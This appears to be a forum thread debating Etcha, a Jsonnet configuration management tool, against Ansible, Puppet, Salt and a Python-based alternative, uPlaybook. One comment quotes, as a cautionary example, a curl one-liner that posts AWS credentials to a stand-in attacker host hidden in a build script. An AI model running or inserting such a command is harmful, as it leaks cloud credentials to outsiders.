While developing a SaaS, we needed a way to distribute configurations across a wide array of machines. We built Etcha as a way to build and run servers and applications using familiar Jsonnet and GitOps workflows: lint, test, build, and release.
It's nice that you've decided to throw off the golden veil of "declarative" that so many of these tools sell themselves with, when in practice the user still ends up writing imperative logic while being harangued by the declarative representation.
Couple things I personally take issue with:
String-embedding of code and templates is just straight up a nonstarter for me. I've seen enough dev/ops people struggle with tools like Nomad and Helm to know any sufficiently complex setup will inevitably become a huge, opaque usability mess.
Finally, I just don't believe a "mutate the bag of state" strategy is the future of config management or DevOps tech. It's shown itself time and time again to be the weakest part of systems like Salt, Ansible, and Puppet. I can't count the number of hours of my life that have been wasted writing code that attempted to, poorly I might add, perpetuate the lie of determinism this tooling tries to sell on top of the mutable bag of state that is an OS.
Your comment really resonates with me, because I'm experimenting with a project to do "ansible, but with Python syntax" [1]. It has some declarative abilities, but also full imperative abilities, and does away with "coding in YAML", so I get full LSP abilities.
I've considered the question: What is the difference between declaratively providing an Apache config file, and just copying that file over unconditionally? The big benefits I've come up with are:
- Detecting the change so I can trigger an Apache restart only when the file has changed.
- Ability to do "--check" and "--diff" to tell me what will change during a dry run.
With the downside that the "tasks" become more complicated to build; a rough sketch of that trade-off is below.
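For example, here's a minimal sketch in plain Python (not real uPlaybook code; deploy_config and the file paths are made up for illustration) of a change-detecting copy that delivers both of those benefits over an unconditional copy:

    # Sketch: why a change-detecting copy beats an unconditional one.
    # deploy_config is a made-up name; the paths are illustrative.
    import difflib
    import shutil
    from pathlib import Path

    def deploy_config(src, dest, check=False, diff=False):
        """Copy src to dest only if contents differ; return True if a
        change happened (or would happen, in --check mode)."""
        new = Path(src).read_text()
        old = Path(dest).read_text() if Path(dest).exists() else ""
        if new == old:
            return False  # no change, so no Apache restart needed
        if diff:  # the --diff behavior: show what would change
            print("".join(difflib.unified_diff(
                old.splitlines(keepends=True),
                new.splitlines(keepends=True),
                fromfile=dest, tofile=src)))
        if not check:  # --check is a dry run: report, don't mutate
            shutil.copy(src, dest)
        return True

    if deploy_config("apache.conf.new", "/etc/apache2/apache2.conf"):
        pass  # only here do you trigger the Apache restart handler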
I had previously built a version of my tool that was just a simpler, local Ansible-like tool with a YAML syntax, and realized: I really hate coding Ansible playbooks in YAML. So I started imagining what it might look like if it was in code. I picked Python syntax because I really didn't want to write a parser for a DSL and wanted to see if I could get close enough without one.
Love that you're playing in the space! The more people that experiment with approaches, the more we'll see what does and doesn't work.
Couldn't agree more with how painful "coding" in Ansible is. My SOP with it is usually just to write a Python module to model the flow I'm interested in the moment I find myself trying to implement logic at the YAML layer. The module API isn't horrible; I prefer it quite a bit over Puppet's extensibility constructs.
However, the nondeterministic bag-of-state issue will still be impossible to overcome with this strategy. Not to say that making a better Ansible isn't valuable for configuring legacy workloads in legacy runtime environments; only that it's a space I'm personally putting a lot of energy into never interacting with again if I can help it.
Think of the system(s) you're targeting and the mutation operations you're defining in the CM language: the configuration files and their contents, the binaries and their instances, etc. are all contained in a giant bag of state we call the OS, with its filesystem and memory contents.
None of the popular configuration management systems can guarantee determinism in mutations over this state. No matter how much the interface and documentation try to sell it as a feature, it's just not possible.
If it's not apparent why this is the case, then I'd highly recommend not embarking on the process of creating such a system, as absolutely enormous amounts of code behind the scenes of the existing systems are aimed at making it _seem_ like they can be deterministic.
When you say that none of the popular CMs can guarantee determinism, are you meaning things like package drift as the OS upstream updates packages and that sort of thing?
It's a little early to be recommending I don't embark on creating this; you have an idea in your head which the phrase "bag of state" isn't adequate to convey into my head.
The CMs are largely about conveying a state into a system, though there are obviously some places where the state is "leaky" such as if I say "the system will have neovim" and it's leaky because today I may get neovim v0.9.X but tomorrow I may get v0.10.Y?
Or are you meaning something like "my laptop install that I've been using for 3 years has a state that is very different from a clean install, so running this playbook on two systems and requesting "nvim" may produce v0.9.x on one, but alpha v0.11.Z on another because I've added a PPA to it"?
I'm honestly just trying to understand what issue you are bringing up, and I appreciate the discussion.
For some context: I've been using Ansible for ~7 years now, my combined "main.yml" files total just over 19K lines, nearly my entire Linux infrastructure comes up from a base OS install and an Ansible run, ~200 machines, and I respin half my dev+stg infrastructure every night to make sure I'm running against my latest playbooks.
I don't know if you've considered it, but I would really value Starlark over "general purpose" Python. My grave complaint about unlimited-computation things for build systems (gradle, sbt :eyes:), or in this case a config management tool, is that they become really hard to reason about from one developer's machine to another, and/or make the hairs stand up for paranoid folks who really would prefer there not be a $(curl -d @$HOME/.aws/credentials evil.example) hiding in a random build script.
It also prevents newbies from mistakenly calling os.chdir when they really wanted fs.cd(), as in your example playbook.
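To make that concrete, here's the footgun in miniature (fs_cd below is a hypothetical scoped helper in the spirit of your fs.cd(), not a real uPlaybook API):

    # os.chdir mutates process-global state and leaks across tasks;
    # a scoped helper confines the change. fs_cd is hypothetical.
    import os
    from contextlib import contextmanager

    @contextmanager
    def fs_cd(path):
        """Change directory only for the enclosed block, then restore."""
        prev = os.getcwd()
        os.chdir(path)
        try:
            yield
        finally:
            os.chdir(prev)

    os.chdir("/tmp")     # every task that runs after this is now in /tmp
    with fs_cd("/tmp"):  # only this block runs in /tmp
        pass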
That's a fascinating idea, and it does resolve uPlaybook's biggest downside: the benefit of YAML is that you can't really sneak code in there. Thanks for putting that on my radar!
I'm trying to do a similar thing, but I'd like to be compatible with the existing Ansible tasks. I'm still trying to figure out the API, especially for cases like calling a playbook from a playbook with some parameters.
I am looking at adding the ability to call Ansible tasks (community.apt, for example) from uPlaybook, but I'm thinking that would not involve calling YAML playbooks... though maybe that would be possible.
I did try some other YAML control structures in the original version of uPlaybook, what I'm calling uPlaybook1 [1] now, which I think has some more natural control structures than Ansible. If you are doing something similar, it may be worth looking at what I came up with:
- I ended up using "block:" as a way of grouping tasks, and you could add conditionals or loops on those blocks.
I had that on my list to give a more thorough look-see a few months ago, after it was mentioned in some discussion about Fabric replacements. Thanks for putting that back on my radar.
I had been wanting to leverage Ansible to get a bunch of functionality with little additional effort, but was trying to do it via direct Ansible API calls, and having no luck. I tried the same with pyinfra with similar results. However, I was able to build a shim that calls pyinfra, and I'm making wrappers to import that functionality into uPlaybook.
So now I have apt and systemd and pip support that I had been wanting.
The primary benefits of uPlaybook over Ansible/pyinfra/Chef, etc., are:
- Playbook discoverability. (Run "up" and it'll give you a list of available playbooks and a short description of them).
- Playbook arguments. (Run "up playbook --help" to get a list of CLI arguments the playbook takes. Instead of static playbooks you can have templatable plays that automate generic tasks with specializations; see the sketch after this list).
- Lack of boilerplate for local host operations. (You don't have to set up inventories, you just run a playbook, with the limitation that you are running locally. IOW, local operation is dead simple, like with a shell script).
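Roughly, a playbook ends up looking like this (a simplified sketch, not exact uPlaybook syntax; the names here are approximate, so check the repo for the real API):

    # Simplified sketch of the playbook style; names are approximate.
    # Declared arguments drive "up playbook --help", and their values
    # template into tasks.
    from uplaybook import core, fs

    core.playbook_args(
        core.Argument(name="hostname", description="Vhost to create"),
    )

    fs.mkdir(path="/var/www/{{ hostname }}")
    fs.cp(src="vhost.conf.j2",
          path="/etc/apache2/sites-available/{{ hostname }}.conf")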
Throw rocks at me if you like, but Ansible is more of a Swiss Army knife than just CM; I can trivially provision a cloud something (and there are a lot of cloud somethings that it supports, not just "hurr, I can make an ec2 instance hurr"), then do traditional config management upon those resources, then do local tasks -- which I recognize may rub folks the wrong way, but for good or bad it's damn handy in a lot of my specific use cases -- then go back to doing cloud or CM stuff, all within the same playbook.
Also, what really jams me up is their crazy nomenclature <https://docs.saltproject.io/en/3005/glossary.html>, trying to be "cutesy" and really going all-in on that salt thing. I have heard similar, justified complaints about Brew's "Cellar", "Keg", "Tap", etc.
A co-worker keeps mentioning we should use terraform, but I'm not getting a very good answer, and haven't had time to do my own research, on why we should use TF rather than writing playbooks to provision AWS resources. Your comment above makes me wonder if, because I'm so steeped in Ansible, I'm not realizing that some of the other CMs are lacking these functions and need to lean on TF, where in Ansible you do not. I'm willing to admit that TF might be a better way of expressing it.
As far as cutesy language, I don't really get jammed up by it, but I'll admit I kind of roll my eyes whenever I come across it. If it's a great tool, I'll overlook that (as in the case of brew). Kind of a "bless your heart" situation. :-)
At the time I selected Ansible, Saltstack had just had a fairly serious "we invented our own crypto" issue, but also Ansible's agentless approach was nice for my environment, though Saltstack did have some great demos of what you could do with their approach, and I had friends who were working on Ansible, which seemed like it was worth something... I'll take a look to see if Saltstack is in the same space as uPlaybook.
> String-embedding of code and templates is just straight up a nonstarter for me
Can you expand on this?
> Finally, I just don't believe a "mutate the bag of state" strategy is the future of config management or DevOps tech.
Unfortunately that is how operating systems work (today). Even Nix struggles with state (though that's typically a bug). Properly controlling/preventing side effects with configuration management would require a new OS paradigm IMO.
> I can't count the number of hours of my life that have been wasted writing code that attempted to, poorly I might add, perpetuate the lie of determinism
One nice thing about Etcha is it makes testing your stuff really simple. Testing is baked into the tool, and you don't really have to write separate tests; the test is whether your check passes/fails correctly after a command is changed/removed. Check out the docs on it here for more info, it really helps with validation: https://etcha.dev/docs/guides/testing-patterns
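Conceptually the testing model boils down to this (a Python sketch of the idea, not Etcha's actual code or API; the Command fields are an assumption for illustration):

    # Sketch of the testing model: a command passes if its check
    # succeeds after change runs and fails after remove runs.
    from dataclasses import dataclass
    from typing import Callable

    @dataclass
    class Command:
        check: Callable[[], bool]   # True when desired state holds
        change: Callable[[], None]  # put the system into that state
        remove: Callable[[], None]  # undo the change

    def test_command(cmd):
        cmd.change()
        if not cmd.check():
            return False        # change didn't satisfy its own check
        cmd.remove()
        return not cmd.check()  # remove must make the check fail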
This may be quite clear in its simplicity, particularly to those familiar with Etcha/Jsonnet. However, what invariably happens is that you start seeing things like vars embedded in templates, embedded in the config mgmt implementation language, embedded in strings. The source of the values becomes incredibly difficult to reason about and to make changes against; does the value come from the target host's env, from the runner's env, from the packaging step's env, from a network request made by one of these stages (e.g. to a secret server), etc.?
Bash code, in yaml, in golang template. Besides even the most advanced IDEs failing to grok such a freak of technical nature, there's no way I would believe any dev that told me they understand what the state of their system will be given some input to this morass.
In a recent position I was asked to try to make an existing Nomad installation viable in a pretty standard corporate environment (not some special operational space, e.g. Cloudflare), and it was even worse: some configuration expansion was 5 layers deep, with 3 different templating engines, once Consul templates were involved in generating an app's config and the Nomad config was env-generalized through generation by higher-level Helm-like tooling.
Re state bag:
I'm glad you mentioned Nix, as I think it, and to a lesser extent containers, really approach the issue in the only humanly-tenable fashion (again, IMO): starting mutation from a known state. In a lot of cases that state is "nothing", as it's not only the simplest known state at which to position the beginning of some configuration flow, but also the most straightforward from which to deterministically derive a desired end state.
I definitely applaud having tests as a core component of your system; the problem is that you cannot derive determinism from nondeterminism, even with the best tests.
Because you are operating over a nondeterministic bag of state, you can never guarantee that your tests represent a transform from any potential state to the desired end state, only from some particular input state (or set of states), which may or may not be representative of what is found on the actual targets.
I get some "managed Ansible executor" vibes from this, and I'm having a hard time differentiating it from the Ansible approach.
What advantage does this custom format have over industry-standard tools?
Also, I'm not entirely sure how the state/sync loop is achieved from what I've read in the docs. Do I have to change my app to pull config?
- It's Jsonnet instead of YAML/HCL. That means real functions, imports, and data structures.
- It has built-in testing and linting functionality.
- While push mode functions similarly to Ansible, pull mode can scale infinitely, as it's just clients pulling a text file. Ansible and friends have a lot of scaling issues with larger numbers of clients.
- All of the rendering happens on the client, no need to bundle secrets.
The state/sync loop is achieved by running Etcha as a service or container in pull or push mode. Etcha will periodically pull down new JWTs (or receive pushed ones), diff them, run the changes, and remove commands that are no longer present.
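In pseudocode, the pull loop looks something like this (a conceptual Python sketch, not Etcha's actual code or API):

    # Conceptual pull-mode sync loop: fetch the signed desired state,
    # diff against what's running, apply additions, remove absences.
    import time

    def fetch_desired():
        """Pull and verify the signed JWT; return {name: command}."""
        return {}  # stub for illustration

    def run(cmd): print("apply:", cmd)      # stub
    def remove(cmd): print("remove:", cmd)  # stub

    current = {}
    while True:
        desired = fetch_desired()
        for name, cmd in desired.items():
            if current.get(name) != cmd:
                run(cmd)              # new or changed commands
        for name in set(current) - set(desired):
            remove(current[name])     # commands no longer present
        current = desired
        time.sleep(60)                # poll interval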
Ansible pull is definitely an option, but it's not how most folks use Ansible in my experience (preferring Tower or ad hoc runbooks), namely because it's harder to centrally manage and configure. Etcha creates release artifacts instead of pulling down a git repo, and allows you to monitor your deployments using metrics services like Prometheus. Additionally, there is a complete webhook framework for triggering runs.
I've desperately wanted a modern config management tool for ages. This looks nice, although I'd need to actually use it to be able to tell if would work for me. I've worked with both Ansible and Puppet and prefer Puppet's architecture, but it is an absolute beast of a tool.
Unfortunately, I think the production licensing here will limit the success. I can't see companies forking out $1,000 a year for an immature tool with no ecosystem when they could just use Ansible/Puppet/Salt. Not necessarily even because of the cost, it's just a lot of extra bureaucracy to get products approved in some places.
I have a few customers; the $1,000 subscription isn't a deal breaker at all. It's typically easy for most businesses to get small expenses like that approved or just whip out the credit card.
Additionally, you can use the software without the subscription for your personal needs or in a non-production/evaluation phase.
In the next couple of weeks we'll release EtchaOS, an immutable "meta Linux distro" that bundles Etcha, systemd, and containerd/docker, in variants like Debian, Alma, and Fedora, for architectures like amd64 and aarch64.
Yes, I don't doubt you'll have customers. From the docs, I just don't see a compelling advantage Etcha has over existing tools that justifies the cost.
Did you consider having an open beta? It might allow the ecosystem to develop while still enabling you to charge for the product later down the line.
At my last job, at a bank you most likely know of, getting any kind of product approved is a painful, multi-month bureaucratic process. So engineers tend to live off the land with the stuff they can get for free, despite funds not being an issue.
> Did you consider having an open beta? It might allow the ecosystem to develop while still enabling you to charge for the product later down the line.
I don't think being free for personal/non production limits the ecosystem at all. Additionally, I don't appreciate rug pulls from changing free to non-free down the road, and I doubt my customers would.
The pricing is what it is: ensure Etcha is sustainable and supported. Think of it as a forced OSS donation if you want. There's way more than $1,000 worth of value here.
>I don't think being free for personal/non production limits the ecosystem at all
There are two aspects. The first one being that charging a nonzero amount decreases adoption, so fewer companies will publish modules and tools around it. The other is that people will generally not want to send pull requests adding features to something they have no stake in. If we take HashiCorp Packer or Ansible as an example, they have flourished as engineers send PRs extending the tools for their own purposes.
Another thought that comes to mind is: what if your company disappears one day? Can you make some assurances that the source will be relicensed to allow users to maintain it?
I wish your product great success. If it feels nice I may even end up getting a license in a future job myself. But I have stated my concern of missing out on all that the Ansible/Puppet community already provides.
I proposed something similar at $work for edge environments where a full k8s control plane doesn't make sense, though I kept it pull-only by polling S3 for work and pushing responses to an append-only log. It uses a declarative k8s syntax, so it theoretically allows workloads to be managed either way.
It didn't really get traction; glad to see something like it realized, even if it isn't the licensing model I'd pick.